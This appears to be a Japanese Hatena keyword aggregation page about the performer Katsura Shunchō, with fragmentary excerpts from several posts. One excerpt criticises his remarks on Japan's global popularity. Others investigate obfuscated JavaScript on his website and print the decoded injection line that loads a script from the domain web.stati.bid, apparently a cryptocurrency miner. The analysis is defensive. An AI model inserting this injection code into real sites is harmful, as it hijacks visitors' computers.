  |
はてなキーワード: 桂春蝶とは
私はむしろ
なんてサラッと言っていることの方が気になった。
自分の国に誇りを持つことは良い。私は日本人であることに誇りを持っているし、日本に生まれて良かったと思っている。
けど自分から「日本は世界中から憧れられてます」なんて言うか普通?
そもそもなんでそんな考えを持つに至った?
日本礼賛コメントばかりをまとめた「海外の反応ブログ」でも読み過ぎたか?
「日本すごい」「日本最高」こんな外国人の声を聞くのは正直言って気分がいい。
けど、桂春蝶みたいに「日本最高」「日本は世界中から愛されている」と本気で思っている人がいたらちょっと危険だと思う。
JavaScriptには詳しくないため、コードをまるごと検索につっこんで類似例を見つけたいところだが、記号が多用されたコードはそのままではぐぐれないので
"javascript obfuscator dollar underscore" といったキーワードで検索
すると下記の解説サイトがヒットし、JJEncodeというツールで難読化されたものであることがわかる
https://blog.korelogic.com/blog/2015/01/12
デコードツールも紹介されているのでさっそく試してみると、以下の結果が得られる
var el = document.createElement('script'); el.src = 'https://web.stati.bid/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.20'; document.head.appendChild(el);
次に "web.stati.bid" でぐぐると下記のブログがヒットする
それによると去年12月ぐらいから複数のサイトが改変被害に遭っていて、同じスクリプトを挿入されているらしい
飛び先のURLはいくつかあるが、中でもこのstati.bidドメインは今月登録されたばかりの非常に新しいもののようだ
https://blog.sucuri.net/2018/02/wikipedia-page-review-revealed-minr-malware.html
ちょうど英語Wikipediaでも同ドメインへ繋がるリンクが貼られて一悶着あったようだが、そのURLは桂春蝶サイトに埋め込まれていたURLと(パラメータ込みで)完全一致する
警告は JS:Includer-BJQ [Trj] で、JavaScriptによるトロイのリンク埋め込みの判定だ。
ウイルスバスターなど、トレンドマイクロ社の製品でも遮断されるという報告がある。
警告はJS/CoinMiner.AEで、トロイのうち、仮想通貨マイニングスクリプトの判定だ。
しかし、念のためにオンラインURLスキャナーに掛けてみると、
https://virusdesk.kaspersky.com
共にSafe/clearの判定なのである。
rescan.proではHTTPエラー403以外SAFEとの事だが、そもそも403食らって何故スキャン出来るのか?
炎上しているので嫌がらせ登録された可能性もあるが、ユーザーのpostだけでブラックリスト入れるほどユルイセキュリティベンダもない筈だ。
